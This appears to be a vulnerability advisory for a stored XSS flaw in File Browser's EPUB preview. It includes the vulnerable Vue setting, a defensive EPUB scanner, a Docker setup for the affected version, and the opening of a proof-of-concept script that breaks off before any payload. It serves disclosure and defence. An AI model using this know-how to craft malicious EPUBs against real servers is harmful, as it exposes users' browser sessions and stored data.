The EPUB preview function in File Browser is vulnerable to Stored Cross-site Scripting (XSS). JavaScript embedded in a crafted EPUB file executes in the victim's browser when they preview the file.
frontend/src/views/files/Preview.vue passes allowScriptedContent: true to the vue-reader (epub.js) component:
```vue
// frontend/src/views/files/Preview.vue (Line 87)
:epubOptions="{
  allowPopups: true,
  allowScriptedContent: true,
}"
```
epub.js renders EPUB content inside a sandboxed <iframe> with srcdoc. However, the sandbox includes both allow-scripts and allow-same-origin, which renders the sandbox ineffective — the script can access the parent frame's DOM and storage.
The epub.js developers explicitly warn against enabling scripted content.
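As an added defender-side example (my code, not part of this report or of File Browser), the following Python scanner walks an EPUB's `META-INF/container.xml` and OPF manifest and flags every content document that carries script: a manifest `properties="scripted"` declaration, `<script>` elements, `on*` event-handler attributes, or `javascript:` URLs. These are exactly the things a viewer executes once `allowScriptedContent` is enabled, so a check like this belongs in the upload path. Function names and the in-memory sample EPUB are constructed for the example.

```python
import io
import posixpath
import xml.etree.ElementTree as ET
import zipfile
NS_CONTAINER = "urn:oasis:names:tc:opendocument:xmlns:container"
NS_OPF = "http://www.idpf.org/2007/opf"

def find_scripted_content(epub_bytes):
    """Return (path, reason) pairs for every XHTML/SVG content document that carries script."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(epub_bytes)) as z:
        # container.xml names the package document (OPF); manifest hrefs are relative to it
        container = ET.fromstring(z.read("META-INF/container.xml"))
        opf_path = container.find(f".//{{{NS_CONTAINER}}}rootfile").get("full-path")
        for item in ET.fromstring(z.read(opf_path)).iter(f"{{{NS_OPF}}}item"):
            if item.get("media-type") not in ("application/xhtml+xml", "image/svg+xml"):
                continue
            path = posixpath.normpath(posixpath.join(posixpath.dirname(opf_path), item.get("href")))
            if "scripted" in (item.get("properties") or "").split():
                findings.append((path, "manifest declares properties='scripted'"))
            try:
                doc = ET.fromstring(z.read(path))
            except ET.ParseError:  # an unparseable document cannot be vouched for either
                findings.append((path, "not well-formed XML"))
                continue
            for el in doc.iter():
                if el.tag.rsplit("}", 1)[-1].lower() == "script":
                    findings.append((path, "<script> element"))
                for attr, value in el.attrib.items():
                    name = attr.rsplit("}", 1)[-1].lower()
                    if name.startswith("on"):
                        findings.append((path, f"event handler attribute {name}"))
                    elif name in ("href", "src") and value.strip().lower().startswith("javascript:"):
                        findings.append((path, f"javascript: URL in {name}"))
    return findings

def build_sample_epub(chapter_body):
    """Constructed test data: a minimal EPUB 3 with a single chapter (not a real book)."""
    container = (f'<container version="1.0" xmlns="{NS_CONTAINER}"><rootfiles><rootfile '
                 'full-path="OEBPS/content.opf" media-type="application/oebps-package+xml"/>'
                 '</rootfiles></container>')
    opf = (f'<package xmlns="{NS_OPF}" version="3.0" unique-identifier="uid"><metadata/>'
           '<manifest><item id="c1" href="chapter1.xhtml" media-type="application/xhtml+xml"/>'
           '</manifest><spine><itemref idref="c1"/></spine></package>')
    with zipfile.ZipFile((buf := io.BytesIO()), "w") as z:
        z.writestr("mimetype", "application/epub+zip", compress_type=zipfile.ZIP_STORED)
        z.writestr("META-INF/container.xml", container)
        z.writestr("OEBPS/content.opf", opf)
        z.writestr("OEBPS/chapter1.xhtml", f'<html xmlns="http://www.w3.org/1999/xhtml"><body>{chapter_body}</body></html>')
    return buf.getvalue()
```

Rejecting or quarantining any upload for which `find_scripted_content` returns a non-empty list is a cheap second line of defence even after `allowScriptedContent` is turned off.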
I've crafted a PoC Python script that can be run in a test environment using Docker Compose:

```yaml
services:
  filebrowser:
    image: filebrowser/filebrowser:v2.62.1
    user: 0:0
    ports:
      - "80:80"
```
And running this PoC Python script:

```python
import argparse
import io
import sys
import zipfile
import requests

BANNER = """
Stored XSS via EPUB PoC
Affected: filebrowser/filebrowser <=v2.62.1
Root cause: Preview.vue -> epubOptions: { allowScriptedContent: true }
Related: CVE-2024-35236 (same pattern in audiobookshelf)
"""

CONTAINER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<container version="1.0" xmlns="urn:oasis:names:tc:opendocument:xmlns:container">
  <rootfiles>
    <rootfile full-path="OEBPS/content.opf" media-type="application/oebps-package+xml"/>
  </rootfiles>
</container>"""

CONTENT_OPF = """<?xml version="1.0" encoding="UTF-8"?>
<package xmlns="http://www.idpf.org/2007/opf" unique-identifier="uid" version="3.0">
  <metadata...
```
2.62.2

CVSS v3.1 base score 7.6: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N